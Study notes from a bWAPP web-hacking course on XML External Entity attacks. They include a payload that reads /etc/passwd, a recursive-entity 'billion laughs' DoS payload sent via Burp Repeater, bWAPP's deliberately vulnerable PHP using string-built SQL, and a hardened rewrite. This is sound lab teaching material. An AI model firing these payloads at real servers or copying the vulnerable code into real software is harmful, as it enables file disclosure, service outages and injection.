Source
Inflearn, "Complete Web Penetration Testing Practice with bWAPP", lecture 22 https://www.inflearn.com/course/%EB%B9%84%EB%B0%95%EC%8A%A4-%EB%AA%A8%EC%9D%98%ED%95%B4%ED%82%B9-%EC%8B%A4%EC%8A%B5/
XML External Entity Attack
- Exploits a weakness at each stage of Input -> Process -> Output
XML External Entity Attacks (XXE)
XML code to insert
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "file:///etc/passwd"> ]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
##############################################################
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT login (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<reset><login>&lol9;</login><secret>blah</secret></reset>
Click "Any Bugs?", open the BurpSuite Repeater and insert the XML code above
- The server takes a very long time to respond
Why the server responds slowly
- The entities lol1 through lol9 are declared one after another, and the problem occurs at the final line
<reset><login>&lol9;</login><secret>blah</secret></reset>
- Each ENTITY references the one above it, so expanding &lol9; causes a DoS -> called ___ times
The defensive part of XXE-2.php
$login = $xml->login;
$secret = $xml->secret;

if($login && $login != "" && $secret)
{
    // $login = mysqli_real_escape_string($link, $login);
    // $secret = mysqli_real_escape_string($link, $secret);

    $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";

    // Debugging
    // echo $sql;

    $recordset = $link->query($sql);

    if(!$recordset)
    {
        die("Connect Error: " . $link->error);
    }

    $message = $login . "'s secret has been reset!";
}
else
{
    // Disables XML external entities. Doesn't work with older PHP versions!
    // libxml_disable_entity_loader(true);

    $xml = simplexml_load_string($body);

    // Debugging
    // print_r($xml);

    $login = $_SESSION["login"];
    $secret = $xml->secret;
}
Because the login is simply taken from the session, the value from the XML can no longer be substituted into the secret, so the output cannot be manipulated. Other things can still happen internally, though, so this is not a complete defence. In any case, changing
$login = $xml->login;
to
$login = $_SESSION["login"];
provides some protection. It is still not as safe as disallowing XML tags outright, the way XSS defences do.
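A hardened version of the parsing code above, written for these notes as an added example (it is not bWAPP's own code). It assumes the same $link mysqli connection and $_SESSION['login'] the original uses, and that the raw request body has already been read into $body.

```php
<?php
// Added example (not bWAPP's own code): a hardened replacement for the
// body-parsing part of xxe-2.php above. A <reset> request never needs a
// DTD, so layer 1 rejects any document that declares one; that stops both
// the SYSTEM entity (file:///etc/passwd) and the recursive lol1..lol9
// expansion before libxml sees them. Layer 2 parses with network access
// off and WITHOUT LIBXML_NOENT, so nothing is substituted even if layer 1
// were bypassed. The login comes from the session, never from the body.

function parse_reset_body(string $body): string
{
    // Layer 1: refuse internal and external DTDs outright.
    if (preg_match('/<!DOCTYPE|<!ENTITY/i', $body)) {
        throw new InvalidArgumentException('DTD/entity declarations are not accepted');
    }

    // Layer 2: no external entity loading, no network, no NOENT.
    if (PHP_VERSION_ID < 80000) {
        // Deprecated in PHP 8: libxml >= 2.9 disables the loader by default.
        libxml_disable_entity_loader(true);
    }
    $previous = libxml_use_internal_errors(true);
    $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if ($xml === false || $errors !== [] || $xml->getName() !== 'reset'
        || !isset($xml->secret) || (string) $xml->secret === '') {
        throw new InvalidArgumentException('Malformed or unexpected XML');
    }
    return (string) $xml->secret;
}

// The handler: login is taken from the session, as in the page's defended
// version, so no XML content reaches the response message; the UPDATE is
// parameterised instead of concatenated as in the original $sql string.
function reset_secret(mysqli $link, string $body): string
{
    $login  = $_SESSION['login'];           // never $xml->login
    $secret = parse_reset_body($body);

    $stmt = $link->prepare('UPDATE users SET secret = ? WHERE login = ?');
    $stmt->bind_param('ss', $secret, $login);
    if (!$stmt->execute()) {
        throw new RuntimeException('Update failed: ' . $stmt->error);
    }
    return $login . "'s secret has been reset!";
}
```

On libxml older than 2.9 the libxml_disable_entity_loader(true) call is what actually stops external entity loading; layer 1 is what keeps the result independent of the libxml version.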